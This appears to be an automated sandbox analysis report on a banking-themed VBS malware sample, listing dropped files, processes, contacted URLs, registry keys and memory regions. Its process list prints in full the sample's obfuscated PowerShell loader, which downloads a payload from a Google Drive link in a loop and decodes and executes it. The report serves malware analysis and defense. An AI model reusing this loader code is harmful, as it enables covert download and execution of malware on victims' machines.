Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
e-dekont_swift-details.vbs
|
ASCII text, with very long lines (355), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02sxbdl5.imi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wct10w.5d1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\kartotekskorts.Vrd
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function
Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae;
$Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){&
($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven
Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6
Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc
LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1
Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless
'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere
Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN
FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP
Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei
ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la
Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV
Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless
'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg
I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo
Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk
serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster
(Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca
am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster
(Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu
st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg UsdeeIndverForstvAmanurNubi.k EutrsGigabt UnsceStilndDeliqe PrectPicad.WholesSalpiphen,elOra,giOv
rstDanma( B.fa$NovicI uashnSammedStab.dbrydneCirculTelepiWinnonMe,degUnabre B.acn DefusProgr) D,al ');$Sadelmagervrkstedet=$Vermilingues[0];toptekster
(Hungerless 'Ti ss$VandigFemkal Coy.oF.stebH.alia Win lGenne:Spe.iFGrap.uStav nOp,hakNonent SaliiSkraaoHystenOve fs Se faNonsofBlondpmyelirUucpnvTawn.nVestri
AnagnBepl gPendre H,inngustesarvea=OutstNKorr.eReinswSprin-.artyOHilstb Tripj,vereespildc,enzotTjats DinerSPr.jnySpisesKlerktPartheCangim.enin.tamm
N.aimae Spist Supe.TumblW ForteMes,ibAf.adCSte mlFireaiFolkeeE,pulnUafhatMelle ');toptekster (Hungerless 'Atomd$ StivFRverhu
.esynUd,ikkbilletun.aci unjoAn,manBoa.lsDkadra,eaktf,atiop heffr MalevEntomnHookaiSierrnA utegRe ise ambrnTyggesAr.er.BenovH
H rteV,teraHydr,d Mekae.educrudko.s Tan,[Vand,$ArionOStrejpTils.v Pre uNonderRemitd PhileLysaarDespeiF,dtun Par.gExtersfron
]gra,e=.eren$YahunACorreh PreeiMin.tsKonkrtKnfrioAnskurChorei upec aryt ');$Sandfangene=Hungerless ' dkmpFBusl,uHesten,ndosk
F dntPurgaiBouleo GlownkommesWishlaStratfSvi,epAchror,reenv Allon ChiniAgonin s opgCompueOmvltn BiotsRegre.Dyst D IndioUnselwOuvernh
tudlBat,uo FiniaCoonidForevF ParaiDeaktlkvg neSprag(Outmo$TidsfS PreaaDansed ,rtseIrremlOrkanm Friea orsogFlooreArbejr Emesv
AnderElektkSpildsTrykktRaas.e ,kildAnateeDeca t Fred, rklr$R.bbeKAstrolVestsa SsonmDoetmmVa.ske,uxocralko.nN.okee DegesGeuma)Ferio
';$Sandfangene=$Raadslaaet[1]+$Sandfangene;$Klammernes=$Raadslaaet[0];toptekster (Hungerless 'Ophth$ G,legOxblolsubvioNymphbW
lfwasus,nlInval:un.asNStal,oSphenn PlancBoussa AfkarAudiotLambke DeadlJaguaiDekomzUreteeTone.dDingesRifer=Kredi(revolTPigene
rkaisMletktSporv-RecipP BrasaStanzt pekth Tend Sk dt$Di.krKOradblAn.peaT.stsmTordimUncree arsirDdspanBrevde BandsBirnm)Philo
');while (!$Noncartelizeds) {toptekster (Hungerless 'Ameto$Kol,egRkkehlOprejoperinblkassa,ienolAande:PurpeTHexahi hvill D.oxb
Wordakr.tkgchatte indfReprsrAmiabs,loakeretn lBaku s Me s=Blads$P.nthtOffenrVideruWooleeProgr ') ;toptekster $Sandfangene;toptekster
(Hungerless 'AntiqSse,rtt .anda,umerrUdsugtMirac-Mi,caSsa,nslWencke.elleeMutu pPin,a Fors.4Fresi ');toptekster (Hungerless
'Comid$Histog Sugel Torpo,gelibRad oa Fronl Uncl:Laur.NArkfdo Vurdn ,oencCopriaDeossrJoypotBrnepeIlseblIntr.iHieroz lageRun
edBeanesStyri=,iske(Vaag,TButcheVerd.sHymnetFront-reklaP,ksema,ogittUns ohKont, Bilbo$indskKSkalalInfarasl,tamfly,em.aarnedistir
Surcndi.cue Fatts Resp)reple ') ;toptekster (Hungerless 'R,gis$Engagg .inylErhveoSom.sbG,adya skollThr.a:.lappOAmy,op ,orlsLingui
Upwag AffreDk man ValedPartiemiliessubvo=Distr$SkuedgWo.drlAvi,noPyranbVict.aToboglEska.:CrossSStrukpArbeji ChocrRestaaRo,anlYder.fFidusjSulfoeRecrudRe
ideForfrrPreste ForsnEvneds s,nd+Figur+Un,ut%A,rod$ VedeV Siphe Icter G,mnmGeri,iPr,shlOutcuiDelren SootgSchwauchorieEfters
B at.Frstecsup rofantauStensn M.lltOve.m ') ;$Sadelmagervrkstedet=$Vermilingues[$Opsigendes];}toptekster (Hungerless 'Konde$T,rbigOakuml
ReimoAutombSesquaTo,etl rei :T upeIMyst,nBonittup,pleDragsr GlykmKundseCass zM rgizTrysto HaptsProsc ,ass=Sodde StokrGHondpeLentitTil
t-InterCInd.eo Primn olastHonn eNonbunRerattTreho Kvet$Ca spKBespnlDistraBontemHolopmUncone LuftrLouizn OprueTak esRee,l
');toptekster (Hungerless 'Brike$Billeg Kni l ,onsomariobProfuaGastal Fast:Mug,ehIsdesywanwep silueSjl arProtolJe oroBirdlgNucleiPiestcStictaAffall
Kaffi,rogrtKlu.cyUd.ta Agte=Tilhu Showi[ prodSA.ekkyvarefs S.aatVi dee H,enm unpo.ForsiCP.ylloSpermnUkuravSu.maePericrSidegtMisd.]Zinkk:
ulbj:DiallFSpndhr Vin,osmaasm ,ithB nteaExc,usSterieSpege6R ind4BetroS SurgtFormar No ei,kurknRaadigCello(D.mor$Koty.IbygninEva.utAgaveeinstirDiatomBut.eeBanenzElvrkzomstno
SkinsSpalt)vejle ');toptekster (Hungerless ' Neap$PipikgGallelSeparo,riesbMet,daBnnesl Vome:BurguG SchmrGeokeaLnud,a Overlh
kseiUtilbgBuffe lokk=skrek Marin[,nvirSunidey nvessTricrt Forpe windm Stik. Ulv TSide,eSubofxChac.tKorpu.Afma.ESeparn ynancM.rahoGrunddReen.i
U,denAalbogUopsl]Fusta:Ru,my:DelikAKaldeSFunktCTankeIMacroILards.NonflGHang,e FaldtHalvdSam notHypnor IndeiTredknOpdrigMtaa,(Humou$presbh
,oenyBaad.pScrubeRisotrKilldlBlan.o Ger.gOversiGenercTr.vra FrdilArchaiFishmt.ryseyU amb)Perth ');toptekster (Hungerless 'Uncoh$M.lligSprn.l
Sa moKo.mabKvaliaFor.klPa.ne:OmvenD skovi TidevIntereMiljrrGerfasTuli.iBenchf bbediLan se Kn,cdSorte=Subti$PantoGInsurrGinglaLilleaAccesl
Almei S bsgmorga. BewesUlsteu Mu.tbZickasHa.vdtForm rMonopi Ca.dnScr wg Dags( F,jl2Indfa8 emil5 Grun0Ankr 8Sen.i7Ble d,devov3,nder0Turna1
mano4 rsta6Fortr).tort ');toptekster $Diversified;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://go.micro0
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
https://drive.googPR2
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 8 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.65.174
|
||
|
drive.usercontent.google.com
|
142.250.65.225
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.65.174
|
drive.google.com
|
United States
|
||
|
142.250.65.225
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3478B000
|
trusted library allocation
|
page read and write
|
||
|
17EBAEBD000
|
trusted library allocation
|
page read and write
|
||
|
1C045278000
|
heap
|
page read and write
|
||
|
76E417E000
|
stack
|
page read and write
|
||
|
17ECA991000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3477D000
|
trusted library allocation
|
page execute and read and write
|
||
|
41F7DFF000
|
unkown
|
page read and write
|
||
|
17EB8EF9000
|
heap
|
page read and write
|
||
|
1C044F7C000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
17EB90F0000
|
heap
|
page read and write
|
||
|
17EBAF1A000
|
trusted library allocation
|
page read and write
|
||
|
17EBC5C3000
|
trusted library allocation
|
page read and write
|
||
|
17EBC594000
|
trusted library allocation
|
page read and write
|
||
|
1C0451E0000
|
heap
|
page read and write
|
||
|
17EBCB97000
|
trusted library allocation
|
page read and write
|
||
|
1C044FB7000
|
heap
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
76E46FE000
|
stack
|
page read and write
|
||
|
17ED2FD0000
|
heap
|
page read and write
|
||
|
7FFD34AD0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
17ED2993000
|
heap
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
1C044F8F000
|
heap
|
page read and write
|
||
|
17EB8EE4000
|
heap
|
page read and write
|
||
|
17EBBD4D000
|
trusted library allocation
|
page read and write
|
||
|
17ED30F6000
|
heap
|
page read and write
|
||
|
AB61CFE000
|
stack
|
page read and write
|
||
|
17ED2E63000
|
heap
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
17ED2FA0000
|
heap
|
page execute and read and write
|
||
|
76E43F7000
|
stack
|
page read and write
|
||
|
17ECAC78000
|
trusted library allocation
|
page read and write
|
||
|
AB624FE000
|
stack
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
1639B90A000
|
heap
|
page read and write
|
||
|
17EBC984000
|
trusted library allocation
|
page read and write
|
||
|
17ED3370000
|
heap
|
page read and write
|
||
|
1639B8E0000
|
heap
|
page read and write
|
||
|
17EB8DF0000
|
heap
|
page read and write
|
||
|
17EB9085000
|
heap
|
page read and write
|
||
|
17EBAED8000
|
trusted library allocation
|
page read and write
|
||
|
76E44F9000
|
stack
|
page read and write
|
||
|
1C044F98000
|
heap
|
page read and write
|
||
|
1C044F4E000
|
heap
|
page read and write
|
||
|
1C046E54000
|
heap
|
page read and write
|
||
|
17EB8DE0000
|
heap
|
page read and write
|
||
|
17EBC959000
|
trusted library allocation
|
page read and write
|
||
|
1C044F62000
|
heap
|
page read and write
|
||
|
17EB9020000
|
heap
|
page read and write
|
||
|
1C044F7F000
|
heap
|
page read and write
|
||
|
17ED3156000
|
heap
|
page read and write
|
||
|
17ED2DE0000
|
heap
|
page read and write
|
||
|
1C046E50000
|
heap
|
page read and write
|
||
|
1C044F88000
|
heap
|
page read and write
|
||
|
1C044FB7000
|
heap
|
page read and write
|
||
|
1639B800000
|
heap
|
page read and write
|
||
|
41F7EFF000
|
stack
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EBABB8000
|
trusted library allocation
|
page read and write
|
||
|
17ED2E9B000
|
heap
|
page read and write
|
||
|
1C044F97000
|
heap
|
page read and write
|
||
|
17EBAEB2000
|
trusted library allocation
|
page read and write
|
||
|
76E427E000
|
stack
|
page read and write
|
||
|
1C044F97000
|
heap
|
page read and write
|
||
|
1C044F81000
|
heap
|
page read and write
|
||
|
AB61AFA000
|
stack
|
page read and write
|
||
|
1C04527E000
|
heap
|
page read and write
|
||
|
1C046E52000
|
heap
|
page read and write
|
||
|
17EBB34D000
|
trusted library allocation
|
page read and write
|
||
|
1C044FC1000
|
heap
|
page read and write
|
||
|
1C044FEE000
|
heap
|
page read and write
|
||
|
17EBC5AC000
|
trusted library allocation
|
page read and write
|
||
|
17EB9115000
|
heap
|
page read and write
|
||
|
17ECAB40000
|
trusted library allocation
|
page read and write
|
||
|
17EB90FA000
|
heap
|
page read and write
|
||
|
AB61BFE000
|
stack
|
page read and write
|
||
|
7FFD34774000
|
trusted library allocation
|
page read and write
|
||
|
17EB8EA3000
|
heap
|
page read and write
|
||
|
1C044F3B000
|
heap
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
AB61EFE000
|
stack
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
76E467E000
|
stack
|
page read and write
|
||
|
17ECA9FE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
17EBAA17000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AC0000
|
trusted library allocation
|
page read and write
|
||
|
1C044F52000
|
heap
|
page read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EBC5D7000
|
trusted library allocation
|
page read and write
|
||
|
1C044FE5000
|
heap
|
page read and write
|
||
|
1C045010000
|
heap
|
page read and write
|
||
|
76E477E000
|
stack
|
page read and write
|
||
|
17EBC970000
|
trusted library allocation
|
page read and write
|
||
|
76E40FE000
|
stack
|
page read and write
|
||
|
1C044FC5000
|
heap
|
page read and write
|
||
|
7FFD34A60000
|
trusted library allocation
|
page read and write
|
||
|
17EBCBAA000
|
trusted library allocation
|
page read and write
|
||
|
AB61FFF000
|
stack
|
page read and write
|
||
|
1C044F10000
|
heap
|
page read and write
|
||
|
7FFD34856000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
17EBAF1E000
|
trusted library allocation
|
page read and write
|
||
|
1C046E5E000
|
heap
|
page read and write
|
||
|
76E51CE000
|
stack
|
page read and write
|
||
|
17ED30C0000
|
heap
|
page read and write
|
||
|
1639BA00000
|
heap
|
page read and write
|
||
|
17EB8E96000
|
heap
|
page read and write
|
||
|
17EB8EDF000
|
heap
|
page read and write
|
||
|
17EBCB92000
|
trusted library allocation
|
page read and write
|
||
|
76E42FE000
|
stack
|
page read and write
|
||
|
17EBC9CA000
|
trusted library allocation
|
page read and write
|
||
|
17ED2E33000
|
heap
|
page read and write
|
||
|
17EB8E9B000
|
heap
|
page read and write
|
||
|
17EB8EB7000
|
heap
|
page read and write
|
||
|
1639BA20000
|
heap
|
page read and write
|
||
|
1C04527A000
|
heap
|
page read and write
|
||
|
AB622FE000
|
stack
|
page read and write
|
||
|
17EBA980000
|
heap
|
page execute and read and write
|
||
|
7FFD3492A000
|
trusted library allocation
|
page read and write
|
||
|
1C044FFB000
|
heap
|
page read and write
|
||
|
1C045270000
|
heap
|
page read and write
|
||
|
17ED3147000
|
heap
|
page read and write
|
||
|
17EB90A0000
|
heap
|
page readonly
|
||
|
17ED2DE8000
|
heap
|
page read and write
|
||
|
17ED2F80000
|
heap
|
page execute and read and write
|
||
|
1639BB74000
|
heap
|
page read and write
|
||
|
17EBB2E3000
|
trusted library allocation
|
page read and write
|
||
|
76E47FB000
|
stack
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
17EBC55F000
|
trusted library allocation
|
page read and write
|
||
|
17EBC945000
|
trusted library allocation
|
page read and write
|
||
|
76E457B000
|
stack
|
page read and write
|
||
|
17EB8E10000
|
heap
|
page read and write
|
||
|
17ED2DF0000
|
heap
|
page read and write
|
||
|
7FFD34AE0000
|
trusted library allocation
|
page read and write
|
||
|
1639B900000
|
heap
|
page read and write
|
||
|
7FFD34826000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
AB623FF000
|
stack
|
page read and write
|
||
|
1C044FE3000
|
heap
|
page read and write
|
||
|
17EBAECC000
|
trusted library allocation
|
page read and write
|
||
|
17ED316E000
|
heap
|
page read and write
|
||
|
1C044FC5000
|
heap
|
page read and write
|
||
|
1C044F79000
|
heap
|
page read and write
|
||
|
17EBC74C000
|
trusted library allocation
|
page read and write
|
||
|
76E41FD000
|
stack
|
page read and write
|
||
|
1C044F8C000
|
heap
|
page read and write
|
||
|
1C044FE7000
|
heap
|
page read and write
|
||
|
1C045275000
|
heap
|
page read and write
|
||
|
7FFD34AF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
1C0450F0000
|
heap
|
page read and write
|
||
|
17ED3340000
|
heap
|
page read and write
|
||
|
1C044FB7000
|
heap
|
page read and write
|
||
|
76E3DFF000
|
stack
|
page read and write
|
||
|
76E524D000
|
stack
|
page read and write
|
||
|
17EB8E50000
|
heap
|
page read and write
|
||
|
76E3DB3000
|
stack
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page execute and read and write
|
||
|
17ECAC87000
|
trusted library allocation
|
page read and write
|
||
|
76E407E000
|
stack
|
page read and write
|
||
|
17EB8E66000
|
heap
|
page read and write
|
||
|
17EBAEC8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34990000
|
trusted library allocation
|
page read and write
|
||
|
1C044F73000
|
heap
|
page read and write
|
||
|
17EBA991000
|
trusted library allocation
|
page read and write
|
||
|
17EB9090000
|
trusted library allocation
|
page read and write
|
||
|
AB625FB000
|
stack
|
page read and write
|
||
|
1C044F6E000
|
heap
|
page read and write
|
||
|
17EB8E9D000
|
heap
|
page read and write
|
||
|
7FFD34921000
|
trusted library allocation
|
page read and write
|
||
|
AB621FE000
|
stack
|
page read and write
|
||
|
7FFD34952000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34772000
|
trusted library allocation
|
page read and write
|
||
|
17ED2FA7000
|
heap
|
page execute and read and write
|
||
|
17EBA8F0000
|
trusted library allocation
|
page read and write
|
||
|
76E4476000
|
stack
|
page read and write
|
||
|
76E45FF000
|
stack
|
page read and write
|
||
|
17EB8E5E000
|
heap
|
page read and write
|
||
|
1C045110000
|
heap
|
page read and write
|
||
|
1C044F6E000
|
heap
|
page read and write
|
||
|
17EB9110000
|
heap
|
page read and write
|
||
|
1639BB70000
|
heap
|
page read and write
|
||
|
17EBB01E000
|
trusted library allocation
|
page read and write
|
||
|
17EBC9CE000
|
trusted library allocation
|
page read and write
|
||
|
1639BB75000
|
heap
|
page read and write
|
||
|
1C044F6B000
|
heap
|
page read and write
|
||
|
17EB9060000
|
trusted library allocation
|
page read and write
|
||
|
17ED3145000
|
heap
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
17ECA9A0000
|
trusted library allocation
|
page read and write
|
||
|
17EBA8C0000
|
trusted library allocation
|
page read and write
|
||
|
17ED2E3F000
|
heap
|
page read and write
|
||
|
1C044F9B000
|
heap
|
page read and write
|
||
|
1C044F3A000
|
heap
|
page read and write
|
||
|
17EB9080000
|
heap
|
page read and write
|
||
|
17EB8F04000
|
heap
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34910000
|
trusted library allocation
|
page read and write
|
||
|
76E437E000
|
stack
|
page read and write
|
||
|
7FFD3482C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page execute and read and write
|
||
|
17EBAED0000
|
trusted library allocation
|
page read and write
|
||
|
7DF41AA50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
17EBB2EC000
|
trusted library allocation
|
page read and write
|
||
|
17EB90B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
1C044FC5000
|
heap
|
page read and write
|
||
|
41F7CFD000
|
stack
|
page read and write
|
||
|
17ED2FB0000
|
heap
|
page read and write
|
||
|
1C044F5E000
|
heap
|
page read and write
|
||
|
17ED3141000
|
heap
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34773000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C04527D000
|
heap
|
page read and write
|
There are 215 hidden memdumps, click here to show them.